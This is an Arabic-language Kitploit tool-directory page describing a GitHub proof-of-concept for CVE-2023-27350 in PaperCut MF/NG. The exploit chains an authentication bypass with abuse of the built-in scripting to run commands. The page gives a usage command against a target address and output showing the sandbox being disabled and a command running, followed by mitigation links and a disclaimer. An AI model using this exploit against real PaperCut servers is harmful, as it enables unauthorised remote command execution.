Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-27350 — ثغرة Papercut، الإصدارات المتأثرة هي PaperCut MF أو NG الإصدار 8.0 أو أحدث (باستثناء الإصدارات المُصحَّحة) على جميع منصات أنظمة التشغيل. | Kitploit
أدوات/GitHubGitHub/royall-researchers/cve-2023-27350
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubroyall-researchers/cve-2023-27350

CVE-2023-27350

ثغرة Papercut، الإصدارات المتأثرة هي PaperCut MF أو NG الإصدار 8.0 أو أحدث (باستثناء الإصدارات المُصحَّحة) على جميع منصات أنظمة التشغيل.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-27350

POC لـ CVE-2023-27350 الذي يؤثر على PaperCut MF/NG

##الإصدارات المتأثرة 'PaperCut MF أو NG الإصدار 8.0 أو أحدث (باستثناء الإصدارات المصلحة) على جميع أنظمة التشغيل.'

##الملخص يستخدم هذا POC ثغرة تجاوز المصادقة مقترنة بإساءة استخدام وظيفة البرمجة النصية المدمجة لتنفيذ الأوامر.

##الاستخدام

root@kitploit:~
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

##التخفيفات قم بالتحديث إلى أحدث إصدار أو قم بالتخفيف باتباع التعليمات الواردة في التنبيه الأمني من PaperCut

  • https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

##إخلاء المسؤولية تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا في الأماكن المصرح بها صراحةً. القائمون على المشروع ليسوا مسؤولين عن سوء استخدام البرنامج. استخدم بمسؤولية.

تنزيل الأداة